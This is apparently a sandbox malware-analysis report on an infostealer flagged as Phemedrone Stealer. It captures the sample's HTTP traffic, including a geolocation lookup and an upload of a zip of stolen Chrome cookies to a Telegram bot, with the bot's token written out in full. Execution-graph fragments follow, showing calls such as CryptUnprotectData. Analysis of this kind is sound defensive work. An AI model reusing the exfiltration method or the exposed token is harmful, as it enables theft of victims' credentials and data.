                                                                                      Date: Wed, 15 Jan 2025 12:33:57 GMT
                                                                                      Content-Type: application/json
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      x-request-id: 17e9708ec4ac987c574aceb6565396b5-ASH
                                                                                      strict-transport-security: max-age=15552000; includeSubDomains; preload
                                                                                      access-control-allow-origin: *
                                                                                      access-control-allow-methods: GET
                                                                                      pragma: no-cache
                                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                      geojs-backend: ash-01
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QeiQtNJuPE368Y%2Ffyf6znsVemwzZJZW243JXihAh9HpjMQcjZSXAR4lOqLUKHvJNoqR%2BX7MbvS8788f9A%2BPxxiqGyG8LgPLzOAX2wnq3kvW3ldS74u63cgIj5i%2BLVA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      X-Content-Type-Options: nosniff
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 9025e5adfbc039f4-YYZ
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=14205&min_rtt=14186&rtt_var=5333&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=690&delivery_rate=205836&cwnd=32&unsent_bytes=0&cid=5085992141465ee2&ts=555&x=0"
                                                                                      2025-01-15 12:33:57 UTC244INData Raw: 31 34 36 0d 0a 7b 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 37 34 2e 30 30 36 36 22 2c 22 61 63 63 75 72 61 63 79 22 3a 32 30 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 5f 6e 61 6d 65 22 3a 22 4c 45 56 45 4c 33 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 41 53 33 33 35 36 20 4c 45 56 45 4c 33 22 2c 22 61 73 6e 22 3a 33 33 35 36 2c 22 6c 61 74 69 74 75 64 65 22 3a 22 34 30 2e 37 31 32 36 22 2c 22 61 72 65 61 5f 63 6f 64 65 22 3a 22 30 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74
                                                                                      Data Ascii: 146{"region":"New York","ip":"8.46.123.189","longitude":"-74.0066","accuracy":20,"timezone":"America\/New_York","organization_name":"LEVEL3","organization":"AS3356 LEVEL3","asn":3356,"latitude":"40.7126","area_code":"0","country":"United Stat
                                                                                      2025-01-15 12:33:57 UTC89INData Raw: 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 33 22 3a 22 55 53 41 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 7d 0a 0d 0a
                                                                                      Data Ascii: es","country_code":"US","country_code3":"USA","city":"New York","continent_code":"NA"}
                                                                                      2025-01-15 12:33:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.549708149.154.167.2204433008C:\Users\user\Desktop\qqnal04.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2025-01-15 12:34:02 UTC384OUTPOST /bot7105371916:AAHmKYUFBY4gzPciIZ6nC4H-7mczREtwqxk/sendDocument HTTP/1.1
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600
                                                                                      Content-Type: multipart/form-data; boundary=----------------------------8dd3536fad403f1
                                                                                      Host: api.telegram.org
                                                                                      Content-Length: 734520
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      2025-01-15 12:34:03 UTC25INHTTP/1.1 100 Continue
                                                                                      2025-01-15 12:34:03 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 35 33 36 66 61 64 34 30 33 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5b 55 53 5d 2d 38 2e 34 36 2e 31 32 33 2e 31 38 39 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 50 4b 03 04 14 00 00 00 00 00 3b 3c 2f 5a 47 30 dd 46 1f 01 00 00 1f 01 00 00 28 00 48 00 42 72 6f 77 73 65 72 20 44 61 74 61 2f 43 68 72 6f 6d 65 2f 43 6f 6f 6b 69 65 73 5b 44 65 66 61 75 6c 74 5d 2e 74 78 74 01 00 20 00 00 00 00 00 01 00 18 00 00
                                                                                      Data Ascii: ------------------------------8dd3536fad403f1Content-Disposition: form-data; name="document"; filename="[US]-8.46.123.189.zip"Content-Type: application/octet-streamPK;</ZG0F(HBrowser Data/Chrome/Cookies[Default].txt
                                                                                      2025-01-15 12:34:03 UTC16355OUTData Raw: 56 56 62 6d 4c 54 55 56 2e 65 78 65 0a 50 49 44 3a 20 33 31 37 32 0a 43 6f 6d 6d 61 6e 64 20 4c 69 6e 65 3a 20 22 43 3a 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 20 28 78 38 36 29 5c 4c 71 49 48 7a 43 68 46 53 56 4e 51 48 73 49 56 64 48 62 79 6a 55 58 73 49 66 56 79 6b 4f 41 6c 42 6e 55 5a 4e 75 4b 70 59 63 53 52 59 70 43 6e 72 67 49 50 54 72 64 67 63 47 43 58 5c 53 43 42 46 4a 56 56 62 6d 4c 54 55 56 2e 65 78 65 22 20 0d 0a 0d 0a 50 72 6f 63 65 73 73 3a 20 53 43 42 46 4a 56 56 62 6d 4c 54 55 56 2e 65 78 65 0a 50 49 44 3a 20 31 38 37 36 0a 43 6f 6d 6d 61 6e 64 20 4c 69 6e 65 3a 20 22 43 3a 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 20 28 78 38 36 29 5c 4c 71 49 48 7a 43 68 46 53 56 4e 51 48 73 49 56 64 48 62 79 6a 55 58 73 49 66 56 79 6b 4f 41 6c 42 6e 55
                                                                                      Data Ascii: VVbmLTUV.exePID: 3172Command Line: "C:\Program Files (x86)\LqIHzChFSVNQHsIVdHbyjUXsIfVykOAlBnUZNuKpYcSRYpCnrgIPTrdgcGCX\SCBFJVVbmLTUV.exe" Process: SCBFJVVbmLTUV.exePID: 1876Command Line: "C:\Program Files (x86)\LqIHzChFSVNQHsIVdHbyjUXsIfVykOAlBnU
                                                                                      2025-01-15 12:34:03 UTC16355OUTData Raw: 96 33 07 56 72 b5 c3 5b bb 32 e2 dd fb 20 f0 a4 5e 2f 48 c4 21 e9 3c 79 37 08 d8 fb 7b 17 9e 9f 24 e0 df 1e 15 ff 07 b0 bc e6 20 04 60 e3 a4 57 da e2 49 bc 7e 78 e8 cf 3f 56 c8 bf 4d d7 73 e5 dd 20 79 e7 80 7d fa 96 80 9e d4 eb 05 4f ea f5 02 02 10 f1 f7 bb df fd ae 2d ef e7 bc 5f 52 f5 df 1f 8d a5 fe fb e1 f7 bf ff 7d 92 8b 8f 3d f6 58 38 ee b4 b3 c3 c7 8e 77 24 a0 23 e5 96 27 9e f4 b3 78 82 af 13 93 02 70 14 4f ec 75 42 55 7f 93 02 b0 77 3c c9 d7 8e 15 25 00 bb c6 11 79 bd e0 49 3f d1 d8 e7 51 57 fa 59 3c e9 67 f9 a8 09 40 4f fc 09 4f f0 75 c2 93 7f 80 d4 1b 84 00 94 04 cc c5 9d 44 9f 15 7e 36 6e 73 db e1 49 3f 8b 27 00 ab e3 bf 50 ca bc 3a f1 67 fb 16 c4 5d af 02 30 cf eb 55 00 42 5a 63 04 a0 72 3c 01 28 e1 57 55 f3 95 62 4f 02 50 72 d0 c6 41 e3 34 67
                                                                                      Data Ascii: 3Vr[2 ^/H!<y7{$ `WI~x?VMs y}O-_R}=X8w$#'xpOuBUw<%yI?QWY<g@OOuD~6nsI?'P:g]0UBZcr<(WUbOPrA4g
                                                                                      2025-01-15 12:34:03 UTC16355OUTData Raw: 24 f7 40 95 7f 54 01 32 e7 09 c0 99 f1 ef 2a 72 4f 82 4f f2 8f b1 a4 a0 50 9e e6 b4 a6 31 74 f6 3b 41 34 cf 7a 3b d1 38 f3 ad 51 16 fd 26 d1 3c e3 ad 84 c6 8d d3 7f 9d 18 3e 63 94 a1 45 6f 86 d9 3f 7a 3e 9c b1 e4 f1 b0 c5 a5 f1 1f 93 46 f0 41 f5 d6 df 92 2f fc f8 d1 24 06 57 3d eb e1 81 3e 03 f0 1f ce 7b 22 de 7b bc bf 5c f0 29 66 b1 f3 0e 1d 45 61 9f d4 56 ff 3d 73 72 24 f6 9f ff 5e 78 79 29 02 b0 38 06 fc fa ed bb 84 37 78 1b 70 25 00 77 1f 15 80 0f 48 00 ee 1d de 7f 78 df 52 00 7e 23 fc e7 b3 e2 2f d8 8e 68 1b 04 f6 85 20 1e de 9a 4e 78 82 ce c2 71 5f fd 91 08 b4 6f 05 ae c3 ca bc f1 e0 09 40 8b 27 f8 fa c5 93 82 96 f1 08 c0 54 f5 57 56 fb a9 02 b0 dd 71 de f1 a0 fb 68 9c f4 4a 5b 3c e9 37 48 3c 69 68 41 00 9e 7c ca 29 e1 bd f7 df 4f 02 8f 67 fa d1 22
                                                                                      Data Ascii: $@T2*rOOP1t;A4z;8Q&<>cEo?z>FA/$W=>{"{\)fEaV=sr$^xy)87xp%wHxR~#/h Nxq_o@'TWVqhJ[<7H<ihA|)Og"
                                                                                      2025-01-15 12:34:03 UTC16355OUTData Raw: 83 97 7c d8 63 bd 92 80 c8 3d 3d 0b 90 98 72 68 b5 46 02 50 b2 4f 48 f8 49 f2 29 8e fc 03 8d 93 00 6c 9c fb 56 e8 07 2b eb 3c ac ac 73 39 3b e6 b4 a1 79 d6 db 15 36 3e 7c 4e b1 5e 47 81 bb c1 0a c2 51 01 58 1c 55 b6 e8 de ec e7 b0 22 b2 85 33 7d b1 37 30 ce 7a a3 2d 9e e8 ab c3 15 71 2b 8a 0f b0 00 b4 78 d2 cf e2 89 bc f1 e2 09 bc 7e f1 a4 dc f2 a6 71 d2 2b 15 5e ac 1d 9e e4 6b 87 27 f1 fa c1 93 7c ed f0 24 5e 3f 78 f2 0f 90 73 cb 83 49 01 38 c1 38 52 af 17 3c e9 67 b1 b2 cf c3 93 7e dd d0 38 e4 e9 ae f0 a4 5e 2f 78 52 af 17 26 5a 00 8a 0f af 00 1c a5 b9 ef 23 3d 83 00 14 43 7b c7 7d 4a 78 43 70 7a 4b b0 89 79 74 23 00 db 49 40 2b 00 bb 11 81 83 16 80 9d e6 3b 92 09 40 51 27 00 7b c5 ae 1d fa e2 fd 63 e8 24 ff 72 e1 67 61 6e 10 02 d0 92 8b bc 24 f3 ca 98
                                                                                      Data Ascii: |c==rhFPOHI)lV+<s9;y6>|N^GQXU"3}70z-q+x~q+^k'|$^?xsI88R<g~8^/xR&Z#=C{}JxCpzKyt#I@+;@Q'{c$rgan$
                                                                                      2025-01-15 12:34:03 UTC145OUTData Raw: 67 f9 c7 6c f9 8b e8 c5 b7 f6 ed 0b de d5 ad 3d e7 8f ba b5 33 5e 53 fe 4f f6 b5 e5 2f 2d c3 d1 e0 33 7f ab db a0 ff dc 7f 5f fe 72 5e fe 70 bc f0 9d dd da b3 4a de 69 af 29 9f 69 90 81 03 6b 88 c0 28 01 b7 23 00 4b 2e b7 0b 57 09 f8 88 97 a7 54 c9 c7 de f6 63 0c f9 c7 33 95 80 c6 eb e7 f8 54 cf 2f 96 fd 11 72 85 f5 7f fb 5f ba f5 57 fd e5 28 f8 e2 5c ad f8 43 fa 29 00 a9 cc 43 cc 0d c7 81 6b 0e 7d 69 c7 c2 1a f6 89 6b 95 84 e1 39
                                                                                      Data Ascii: gl=3^SO/-3_r^pJi)ik(#K.WTc3T/r_W(\C)Ck}ik9
                                                                                      2025-01-15 12:34:03 UTC16355OUTData Raw: 53 02 90 7c e2 cd 67 59 28 00 0b 6b bf 5d fe 41 88 04 54 ce 21 ea 20 f6 0b f5 fd 7d f5 62 8f 9e 1a 47 f8 d1 b2 96 ef 02 e8 3b e7 3c 7b 99 d3 3c a7 ca 44 68 f6 af e3 36 46 de 20 f6 e6 ce 05 76 4b 00 52 39 b8 76 66 59 8f f8 a3 7d f2 a5 7d ec 05 ef ef 51 04 f2 5e 40 64 20 d0 27 c6 dc ac 79 fb 21 7f 22 c4 14 7a 88 bf 67 fd 49 b7 f6 2b ef eb 79 62 d9 2b 0a 3f fa 42 2e f3 5c f0 f1 84 8b ab c8 ab a2 4f 8c 49 26 ff 60 5f 00 ee 98 4c fa 45 32 69 b7 9b 64 d2 2f b2 2f 00 cb f3 e7 91 c8 be 8c 4c fe 41 26 ea f6 8a 65 05 20 64 b2 2f 23 93 7e 91 4c fa 45 8e b5 00 5c 94 93 49 bf 48 7c 87 60 46 2a f7 02 b3 72 63 95 60 26 01 37 68 11 7c 03 ad f8 63 1e 8e b5 00 3c 50 f6 00 c7 c8 3d 2f 00 99 3c eb d3 a3 f0 6b c9 04 60 4a 10 77 19 cb 1c 11 6e 73 e9 23 ff 00 d1 17 e5 df c1 67
                                                                                      Data Ascii: S|gY(k]AT! }bG;<{<Dh6F vKR9vfY}}Q^@d 'y!"zgI+yb+?B.\OI&`_LE2id//LA&e d/#~LE\IH|`F*rc`&7h|c<P=/<k`Jwns#g
                                                                                      2025-01-15 12:34:03 UTC16355OUTData Raw: b5 12 d0 bc b8 d7 3c 01 a8 f8 6b ab 00 c9 e5 5d 7f ac 33 46 df 63 bf e6 2a 01 f7 05 e0 02 46 71 14 64 d2 14 a9 d4 5a 9e ba 77 14 6a e1 79 19 e9 67 58 81 6c cf b9 c4 cf 96 71 8c 05 20 7b b4 f2 0f e6 ff ec c3 67 2f c4 77 08 8e ef 0d 0c d4 b8 f3 83 14 8c 15 80 56 07 1e 7e 2b ed 6d c3 fb 03 11 82 5c 26 52 f6 68 be 9f 2d 62 b0 b4 99 d4 5b 85 4c fc 49 26 ea f6 8a 4c f0 2d 22 93 7a ab 90 49 bd 55 c8 e4 de 32 64 82 6e af d9 17 80 25 96 48 b9 a3 c9 be 00 2c eb 77 91 4c e6 6d 87 4c fe 41 26 f5 56 21 93 7d 19 99 d4 5b 85 4c fe 41 26 f9 e6 b1 96 48 be 79 ec 54 00 c2 be 00 dc 3e 7b 7d 04 58 aa f0 2b 79 08 c0 71 7c 94 04 60 94 80 82 fc 3b f8 cc 2f 6c 5e 0a 12 64 9f 63 e6 a6 a4 de 02 a6 84 e1 20 00 ad fa 53 06 1e 7c 46 d9 b7 50 85 60 23 fd 22 0a be 38 b6 ea 6f 94 7f c0
                                                                                      Data Ascii: <k]3Fc*FqdZwjygXlq {g/wV~+m\&Rh-b[LI&L-"zIU2dn%H,wLmLA&V!}[LA&HyT>{}X+yq|`;/l^dc S|FP`#"8o
                                                                                      2025-01-15 12:34:03 UTC16355OUTData Raw: 5b 5a 71 4c 8b d4 8b fd 38 27 51 fe b9 07 20 f6 c0 f7 f5 29 e7 e8 2b fd 18 47 41 18 69 f3 8c b9 17 02 cf fd 1c 9b 43 cb d8 1c c6 ee 63 5c 10 80 5e 4a a2 c8 8b 2c 12 80 f6 21 0a 40 d6 d2 b6 d2 4d 90 6f 51 ca 21 03 ad f6 63 8c dc 53 04 9a 0b c8 3c 05 60 bb 0f 6b 68 a3 f4 f3 5d 7f c4 25 e6 29 e8 a2 94 73 8c e0 53 dc 29 f1 a2 c8 a3 6d 8f ff 12 6f 25 a0 eb c0 79 e3 48 b3 28 da 94 69 0a 40 45 9f b1 16 c5 9b 6b 85 38 eb 95 76 e6 c4 3c e6 c8 53 18 fa 0c e7 59 ef 3a 72 c5 7d c4 75 b4 8c ab 18 0c ef fc b3 ef 0d c0 c0 fb ff ea 3b 00 91 7c c7 5a 00 7e f7 f2 f7 56 e1 47 f5 1f 12 d0 5f 59 ee 4e 38 3e 05 20 f2 2f 11 80 df ba a4 b4 bf d7 75 3f 78 67 77 c3 b5 4f 1b 04 20 c7 80 fb 77 01 de f4 69 aa 00 79 17 e0 bf ad 55 80 bd 00 7c 41 77 bb c7 80 87 db 80 39 06 9c 3d f7 68
                                                                                      Data Ascii: [ZqL8'Q )+GAiCc\^J,!@MoQ!cS<`kh]%)sS)mo%yH(i@Ek8v<SY:r}u;|Z~VG_YN8> /u?xgwO wiyU|Aw9=h
                                                                                      2025-01-15 12:34:03 UTC16355OUTData Raw: 41 fc 45 f9 17 05 a0 f1 28 09 11 80 c8 38 45 1f ad c2 ce b1 ad fd 23 0f fc 60 95 78 f4 e3 91 5e 85 9e fd c3 a7 5e 35 ca 3e 62 51 16 fa cc 9a 7f df 5e fc f5 32 af 17 6f c6 e8 b7 02 50 14 80 ca 3c a0 0f 54 05 7a f4 d7 39 50 0a 1a ef f3 ca 77 50 f6 61 cf 7b 94 ef 86 d6 6a 3f 3f 47 2b 00 a7 c6 03 56 ff 21 fb e8 53 bd 17 05 a0 39 b4 88 3d a5 9f f9 31 4e 3b 1e 01 3e a9 fc 7c 41 ac 31 3e f1 fe e5 7b 2c 2d c7 6e c1 23 bb b4 40 9e d2 0e 71 48 cc 7d 5a 99 e7 b8 8d b1 1f 6b b2 f9 98 e7 67 53 1e 32 ae c2 f1 5e 65 8d b2 2f 08 40 e1 f8 ef b6 8f 00 bf e7 ca 0f 75 1f fc e0 07 bb ab ae bc b2 bb e2 8a 2b ba cb 2f bf bc 7b ff fb de df bd ef bd ef ed de f3 9e f7 74 ef 7a d7 bb ba 77 be e3 9d dd 3b de fe f6 ee 2f fe fc 2f ba ff f2 47 7f 98 0a b9 a3 cd de 08 c0 9d 31 b3 fa 0f
                                                                                      Data Ascii: AE(8E#`x^^5>bQ^2oP<Tz9PwPa{j??G+V!S9=1N;>|A1>{,-n#@qH}ZkgS2^e/@u+/{tzw;//G1
                                                                                      2025-01-15 12:34:04 UTC1133INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Wed, 15 Jan 2025 12:34:03 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 745
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      {"ok":true,"result":{"message_id":41,"from":{"id":7105371916,"is_bot":true,"first_name":"[OUTPUT] - LOGS","username":"outputlog445_bot"},"chat":{"id":8013500311,"first_name":"\u0430\u0433\u0440\u0435\u0441\u0441\u0438\u0432\u043d\u044b\u0439","username":"agressive_g1rl","type":"private"},"date":1736944443,"document":{"file_name":"[US]-8.46.123.189.zip","mime_type":"application/zip","file_id":"BQACAgIAAxkDAAMpZ4erO92ktnz_2KlZIAmudN_-r8MAAmNmAAIvYEFIq2idRbQ-9jc2BA","file_unique_id":"AgADY2YAAi9gQUg","file_size":733811},"caption":" - IP: 8.46.123.189 (United States)\n - Tag: labInstalls_bot \n - Passwords: 0\n - Cookies: 2 \n - Wallets: 0\n - Cookies Tags: \n - Passwords Tags:","caption_entities":[{"offset":0,"length":142,"type":"pre"}]}}


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      0510s020406080100

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      0510s0.0010203040MB

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      • File
                                                                                      • Registry
                                                                                      • Network

                                                                                      Click to dive into process behavior distribution

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:07:33:54
                                                                                      Start date:15/01/2025
                                                                                      Path:C:\Users\user\Desktop\qqnal04.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Users\user\Desktop\qqnal04.exe"
                                                                                      Imagebase:0x29029cc0000
                                                                                      File size:125'920 bytes
                                                                                      MD5 hash:B63E93F067D727C983C46012F35647D4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.2107964117.000002903C016000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.2106933727.000002902BB04000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.2107964117.000002903BCC4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.2106933727.000002902BB20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_PhemedroneStealer, Description: Yara detected Phemedrone Stealer, Source: 00000000.00000000.2018774350.0000029029CC2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.2107964117.000002903BED6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.2107964117.000002903BAF6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_GenericStealer_9, Description: Yara detected Generic Stealer, Source: 00000000.00000002.2107964117.000002903BCF7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:true
                                                                                      Show Windows behavior

                                                                                      File Activities

                                                                                      Show Windows behavior

                                                                                      Section Activities

                                                                                      Show Windows behavior

                                                                                      Registry Activities

                                                                                      Show Windows behavior

                                                                                      COM Activities

                                                                                      Show Windows behavior

                                                                                      Mutex Activities

                                                                                      Show Windows behavior

                                                                                      Process Activities

                                                                                      Show Windows behavior

                                                                                      Thread Activities

                                                                                      Show Windows behavior

                                                                                      Memory Activities

                                                                                      Show Windows behavior

                                                                                      System Activities

                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                      Show Windows behavior

                                                                                      Windows UI Activities

                                                                                      Network Activities

                                                                                      Process Token Activities

                                                                                      There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                      Disassembly

                                                                                      Execution Graph

                                                                                      Execution Coverage

                                                                                      Dynamic/Packed Code Coverage

                                                                                      Signature Coverage

                                                                                      Execution Coverage:15.8%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:23.1%
                                                                                      Total number of Nodes:13
                                                                                      Total number of Limit Nodes:0
                                                                                      Show Legend
                                                                                      Hide Nodes/Edges
                                                                                      execution_graph 11678 7ff848f22130 11681 7ff848f21110 11678->11681 11680 7ff848f22135 11684 7ff848f21129 11681->11684 11682 7ff848f2112e 11682->11680 11683 7ff848f212bb LoadLibraryA 11685 7ff848f2130f 11683->11685 11684->11682 11684->11683 11689 7ff848f215f2 11690 7ff848f21601 CryptUnprotectData 11689->11690 11692 7ff848f217c9 11690->11692 11686 7ff848f27c67 11687 7ff848f21110 LoadLibraryA 11686->11687 11688 7ff848f27c6c 11687->11688

                                                                                      Executed Functions

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 188 7ff848f18b68-7ff848f23ab1 190 7ff848f23b3c-7ff848f23b9d 188->190 191 7ff848f23ab7-7ff848f23abd 188->191 209 7ff848f23b9f 190->209 210 7ff848f23ba5 190->210 193 7ff848f23abf-7ff848f23acd 191->193 194 7ff848f23ae7-7ff848f23aec 191->194 200 7ff848f23b1c-7ff848f23b29 193->200 197 7ff848f23aee-7ff848f23b07 194->197 198 7ff848f23b30-7ff848f23b3b 194->198 202 7ff848f23b09-7ff848f23b0c 197->202 203 7ff848f23b0e 197->203 200->198 204 7ff848f23b10-7ff848f23b1b 202->204 203->204 204->200 209->210 211 7ff848f23ba9-7ff848f23bd5 210->211 212 7ff848f23ba7 210->212 215 7ff848f23c1f-7ff848f240f9 211->215 216 7ff848f23bd7-7ff848f23bfe 211->216 212->211 255 7ff848f240fb-7ff848f24130 215->255 256 7ff848f24133 215->256 216->215 257 7ff848f2413a-7ff848f241f8 255->257 256->257 264 7ff848f24202-7ff848f242b1 257->264 269 7ff848f242fe-7ff848f243c9 264->269 270 7ff848f242b3-7ff848f242fb 264->270 278 7ff848f243cb-7ff848f24413 269->278 279 7ff848f24416-7ff848f24a31 269->279 270->269 278->279 325 7ff848f24a81-7ff848f24b49 279->325 326 7ff848f24a33-7ff848f24a7e 279->326 334 7ff848f24b99-7ff848f24cb1 325->334 335 7ff848f24b4b-7ff848f24b96 325->335 326->325 345 7ff848f24cb3-7ff848f24d01 334->345 346 7ff848f24d02-7ff848f24da0 334->346 335->334 345->346 354 7ff848f24e21-7ff848f24e23 346->354 355 7ff848f24da2-7ff848f24da4 346->355 356 7ff848f24e24-7ff848f24e42 354->356 357 7ff848f24e20 355->357 358 7ff848f24da6 355->358 357->354 359 7ff848f24da8-7ff848f24dd3 358->359 360 7ff848f24dea-7ff848f24df0 358->360 364 7ff848f24dd5-7ff848f24dd7 359->364 365 7ff848f24e54-7ff848f24e56 359->365 361 7ff848f24e71-7ff848f24e7b 360->361 362 7ff848f24df2-7ff848f24e1e 360->362 366 7ff848f24e81-7ff848f24e88 361->366 367 7ff848f25037-7ff848f25050 361->367 362->356 372 7ff848f25056-7ff848f2506c 362->372 369 7ff848f24dd9-7ff848f24ddf 364->369 370 7ff848f24e53 364->370 373 7ff848f24e58-7ff848f24e5a 365->373 374 7ff848f24eb5-7ff848f24ef5 365->374 371 7ff848f24e8a-7ff848f24eb1 366->371 367->356 367->372 376 7ff848f24e60-7ff848f24e6f 369->376 377 7ff848f24de1-7ff848f24de8 369->377 370->373 383 7ff848f24e89 371->383 384 7ff848f24eb3-7ff848f24eb4 371->384 373->367 373->376 386 7ff848f2502b-7ff848f25031 374->386 387 7ff848f24efb-7ff848f25022 374->387 376->361 377->360 383->371 384->374 386->366 386->367 387->386
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2111796974.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff848f10000_qqnal04.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c8c789014dc9d5aa0a2bb311d85c4166176809c259e40bd8f84f7c3b873a782c
                                                                                      • Instruction ID: 17e1693574d6935aa8440aa11c7560997633560f26682e0c71ab7a1c44f192ed
                                                                                      • Opcode Fuzzy Hash: c8c789014dc9d5aa0a2bb311d85c4166176809c259e40bd8f84f7c3b873a782c
                                                                                      • Instruction Fuzzy Hash: B7F2F96061E5C91FD315DB7894A66AEBFA1DF9B380F2988EDD08A8B1E7CC185407C742

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2111796974.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff848f10000_qqnal04.jbxd
                                                                                      Similarity
                                                                                      • API ID: CryptDataUnprotect
                                                                                      • String ID:
                                                                                      • API String ID: 834300711-0
                                                                                      • Opcode ID: 5ce17801aea72e9914284817985d6cbefd642eda25db589f3863675c31684e24
                                                                                      • Instruction ID: 69ca65e3d249859bf4e4803a1d6494840177729b648b19436eba3c6857f72c70
                                                                                      • Opcode Fuzzy Hash: 5ce17801aea72e9914284817985d6cbefd642eda25db589f3863675c31684e24
                                                                                      • Instruction Fuzzy Hash: E681E130908A588FDB99EB18D841BE9BBF1FF59310F0042AAD44DD3292DF35A985CB85
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2111796974.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff848f10000_qqnal04.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
